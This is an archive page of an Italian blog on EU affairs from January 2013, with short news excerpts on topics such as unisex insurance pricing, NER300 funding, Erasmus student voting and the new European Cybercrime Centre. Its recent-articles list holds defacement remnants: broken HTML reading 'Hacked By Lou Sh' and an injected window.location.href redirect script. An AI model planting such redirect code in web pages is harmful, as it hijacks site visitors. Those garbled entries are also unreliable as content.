EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Gennaio 2013
it

Con la sentenza Test-Achats le donne europee al volante si ritroveranno a pagare premi assicurativi più elevati. Si avrà infatti in media un aumento delle tariffe per le donne del 4% circa, mentre in precedenza pagavano tariffe minori rispetto agli uomini che invece avranno una situazione praticamente invariata. Dunque le donne pagheranno tariffe più alte ma in nome della parità dei sessi e della non discriminazione, e non in nome del detto che vuole “donna al volante, pericolo costante”.

La tariffazione unisex è stata introdotta dalla sentenza Test-Achats, emessa dalla Corte di giustizia europea il 1 marzo 2011, la quale sancisce la parità di genere nei contratti assicurativi e si rivolge in particolare ai nuovi contratti (quelli stipulati dopo il 21 dicembre 2012), ai rapporti (...)

it

Sempre più frequentemente, per i ragazzi diversamente abili le vere barriere per l'accesso e l’integrazione nel mondo universitario sono di tipo culturale. Varie soluzioni sono state apportate ai molti problemi che i ragazzi disabili devono affrontare per avere le stesse possibilità offerte ai "normodotati": ad esempio l’esonero dalle tasse, la possibilità di ottenere borse di studio, il servizio di trasporto tra il domicilio e le sedi universitarie.

Su questa scia, il famoso motore di ricerca Google attraverso il progetto “Google Europe and Israel Scholarship for Students with Disabilities” assicura anche ai ragazzi disabili che hanno spiccate capacità di eccellere una borsa di studio nell’ambito informatico. Inoltre, per quei ragazzi che (...)

it

Era il 17 novembre 2010 quando alla città di Maribor (Slovenia), veniva assegnato il titolo di capitale europea dei giovani per l'anno 2013.

La proclamazione è infatti avvenuta durante l’assemblea generale del Forum dei giovani europei, (European Youth Forum General Assembly). A contendersi il titolo con Maribor erano in gara le città di Derry-Londonderry (Regno Unito), Goes (Paesi Bassi), Karlastad (Svezia) e Antwerp (Belgio), (...)

it

A livello europeo e mondiale, le università che hanno ritenuto di trovare giovamento dalla riforma del sistema, sono d’accordo ad adottare la nuova classifica U-Multirank (multidimensionale), diversa dalle classifiche già esistenti.

La nuova classifica valuta gli atenei rispetto a cinque variabili: reputazione nell’ambito della ricerca, qualità d’insegnamento e apprendimento, orientamento internazionale, successo nel trasferimento delle conoscenze (per esempio partnership con imprese e start-up) e impegno regionale. La nuova (...)

it

Il problema dell’inquinamento e della salvaguardia delle condizioni di vita dei cittadini europei è stato sempre un punto tenuto in forte considerazione dall'Unione Europea. Con il nuovo anno Bruxelles ha deciso di introdurre una legislazione riguardante le emissioni di ossidi di azoto e di particolato dei nuovi mezzi pesanti come autobus e camion. Lo scopo della nuova norma, oltre alla salvaguardia del cittadino e dell’ambiente, è anche quello di rilanciare l’industria automobilistica europea.

Come si sa l’anno nuovo inizia sempre con i buoni propositi e con la voglia di mettere in atto ciò che l’anno prima non si è riusciti a fare. L’Unione Europea sembra rispecchiare in pieno questa tendenza e ha iniziato il 2013 imboccando la strada del cambiamento e del rinnovamento. Infatti dal primo (...)

it

Se sei appassionato di diplomazia e vuoi rappresentare il tuo Paese nei più importanti Summits internazionali non prendere impegni dal 17 al 24 giugno 2013! YAS, Young Ambassadors Society, ti dà l’opportunità di diventare Delegato e rappresentare l’Italia ai Forum dei governi più industrializzati al mondo.

Y20 Russia Dal 17 al 22 giungo 2013 in Russia, nell’affascinante cornice offerta dalla città di San Pietroburgo si svolgerà il Youth20 (Y20), il side event giovanile ufficiale del G20. Il Summit Y20 verterà su temi prettamente economici e finanziari. Le due grandi aree tematiche di riflessione (...)

it

L’Ue ha stabilito nuove norme per tutelare ed assistere quei passeggeri che viaggiano via mare e che nel caso di incidenti non avevano diritto ad un risarcimento. Ora le cose sono migliorate e l’Ue si è riproposta, a partire dal 31 Dicembre 2012, la loro entrata in vigore. Usufruiranno di questi nuovi diritti anche quei passeggeri disabili o con capacità di deambulazione ridotta che viaggeranno via mare ed avranno la possibilità di muoversi così come fanno persone comuni che viaggiano in aereo o in treno.

Le nuove norme prevedono informazioni accessibili a tutti i passeggeri prima e dopo il viaggio, informazioni che comprendono anche i loro diritti;un’adeguata assistenza che si propone di offrire snack, pasti e rinfreschi ed inoltre, nel caso in cui ci sia un ritardo alla partenza superiore ai 90 (...)

it

Si chiama Ner300 e darà nei prossimi anni una spinta decisiva allo sviluppo delle energie rinnovabili. Questa è la decisione della Commissione che assegnerà 1,2 miliardi di euro ai 23 progetti più innovativi e funzionali per lo sviluppo delle energie che tra pochi anni saranno la risorsa fondamentale mondiale.

Il 18 dicembre scorso la Commissione ha dato il via a Ner300, il programma di finanziamento che ha assegnato a 23 progetti sulle energie rinnovabili 1,2 miliardi di euro. I progetti interesseranno i campi della bioenergia, energia solare a concentrazione, energia geotermica, eolica e oceanica. (...)

it

L’eterno dibattito sulla questione di dover celebrare o meno un matrimonio tra persone dello stesso sesso è tutt’ora accesa, ma grazie a questa nuova sentenza emessa dalla corte europea dei diritti umani di Strasburgo le cose cambiano radicalmente. Nel caso in cui nel paese siano in vigore norme che regolamentano i rapporti tra coppie gay, i funzionari pubblici non potranno rifiutarsi di celebrare il rito civile del matrimonio.

Il caso nasce in Gran Bretagna da un’impiegata pubblica che si è rifiutata di celebrare le nozze tra una coppia omosessuale a causa del suo credo religioso e per questo è stata licenziata. Oggi, grazie alla nuova sentenza emessa dalla Corte dei diritti umani di Strasburgo, questo non sarà più (...)

it

Tutelare i cittadini e le istituzioni europee dalle frodi online, smascherare le organizzazioni criminali che operano tramite il web e salvaguardare i minori dallo sfruttamento e dagli abusi: è questo lo scopo dello European Cybercrime Centre (EC3). L’utilizzo diffusissimo di Internet da parte degli europei ha spinto l’Unione a costituire nuovi uffici preposti alla protezione dei fruitori della rete.

Lo scorso 11 gennaio è stato inaugurato nella città de L’Aia, nei Paesi Bassi, l’European Cybercrime Centre (EC3), il nuovo centro operativo per la lotta alla criminalità informatica e alle truffe sul web. Situato presso l’Ufficio dell’Europol, la polizia europea, il nuovo organismo avrà come scopo (...)

it

Nei giorni scorsi sono apparsi alcuni articoli sulla mia candidatura alla Camera in Toscana per la lista Monti. Ho grande stima ed ammirazione per il prof. Mario Monti e dunque la sua fiducia nei miei confronti, espressa con la proposta di candidarmi nella mia regione, è stata lusinghiera, (...)

it

Adottata nel 2010, l'Agenda digitale rientra nel progetto Europa 2020. E' una strategia messa a punto al fine di favorire l'utilizzo delle TIC (Tecnologie dell'informazione e della comunicazione), come strumento da applicare per risolvere problemi di natura sociale e con lo scopo di favorire l'economia digitale.

Le nuove 7 priorità Nella conferenza stampa tenuta dalla Vice presidente Neelie Kroes, la Commissione ha proposto come primo urgente obiettivo quello di stabilire una legislazione solida che disciplini la banda larga per evitare discriminazioni in materia di accesso alle reti. Inoltre, ha (...)

it

Per far fronte alle difficoltà vissute dal popolo iracheno, l’UE propone una coalizione a livello economico, solidale e commerciale. Questo per sanare i perenni contrasti che continuamente ascoltiamo attraverso i media e che coinvolgono l’Iraq, soprattutto a livello di diritti umani. Un grande obiettivo che si propongono i parlamentari europei è stabilire la pace ed introdurre norme democratiche fondamentali che ancora mancano.

Avanzamento economico in cambio di un avanzamento in materia di diritti umani per far sì che si arrivi ad una democrazia che possa riequilibrare il Paese: questo il sunto dell’accordo tra UE e Iraq. La proposta di un bilanciamento tra Europa ed Iraq a livello democratico è partita dal relatore (...)

it

Youth guarantee è il progetto che vuole assicurare ad ogni giovane l’occasione di potersi esprimere ed aprire al mondo del lavoro attraverso le proprie abilità e competenze.

Siamo tutti a conoscenza del fatto che trovare un impiego di questi tempi non sia un percorso facile ed accessibile a tutti, soprattutto per quei giovani ragazzi che, usciti dall’ambito universitario, devono affrontare il mondo esterno. Il Parlamento europeo ha da tempo proposto il progetto (...)

it

Nonostante l’impegno immediato del Ministro dell’interno Anna Maria Cancellieri e del Ministro degli esteri Giulio Terzi per trovare una soluzione, i 20.000 studenti Erasmus non potranno votare se non affrontando personalmente i costi di un biglietto di andata e ritorno. In seguito al polverone sollevatosi riguardo il diritto di voto negato agli studenti in Erasmus, l’Italia si è attivata suvito per cercare una soluzione per garantire loro di poter partecipare alla tornata elettorale del prossimo febbraio senza difficoltà. Nelle parole del premier uscente Mario Monti: “Fare tutto quanto è possibile per consentire il voto agli studenti Erasmus”.

Dopo molte polemiche, è arrivata la nota del Consiglio dei Ministri che respingeva la proposta, avanzata dal premier Monti, di trovare un accordo in tempi brevi: «Il Cdm ha valutato approfonditamente, grazie alle relazioni dei Ministri dell’interno e degli affari esteri, la possibilità di (...)

it

Come annunciato nel 2009, le città di Guimarães (Portogallo) e Maribor (Slovenia), cedono lo scettro di Capitali europee della cultura a Marsiglia (Francia) e Košice (Slovacchia), per questo 2013.

Marsiglia La seconda città più grande della Francia sarà coinvolta nel programma culturale, congiuntamente con la Provenza, Arles, Aix-en-Provence e Aubugne. Nel week-end del 12 e 13 gennaio scorso, ha avuto luogo l’inaugurazione di questo anno speciale, con percorsi artistici, cacce al tesoro e (...)

it

Il 19 gennaio 2013 è entrato in vigore il Decreto legislativo 59/2011 che modifica drasticamente le regole per conseguire la patente. Per quelle patenti che si hanno in possesso al periodo precedente il 19 gennaio 2013 cambiano i limiti di età, mentre per coloro che ancora la devono conseguire sono in atto parecchie novità.

La patente, che verrà rilasciata dall’Ue, avrà la forma di una carta di credito in materiale plastico che conterrà lo spazio all’interno del quale verrà posta la foto di riconoscimento, delle informazioni utili all’interno dell’Unione Europea che dovranno essere di facile lettura ed un microchip (...)

it

Nel corso dell’ultima seduta plenaria svoltasi a Strasburgo il 18 gennaio, gli eurodeputati hanno discusso della opportunità di varare norme comuni all’interno dell’Ue per i bagagli a mano. Infatti, secondo il parlamento europeo le compagnie aeree praticano ad oggi eccessive restrizioni per ottenere facili guadagni.

Le posizioni dell’assemblea parlamentare sono state contrastanti; da un lato coloro che sono favorevoli ad inserire norme comuni: ’’Dobbiamo proteggere i consumatori dalle pratiche commerciali abusive che le compagnie aeree utilizzano per generare guadagni supplementari’’, ha affermato (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato



Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France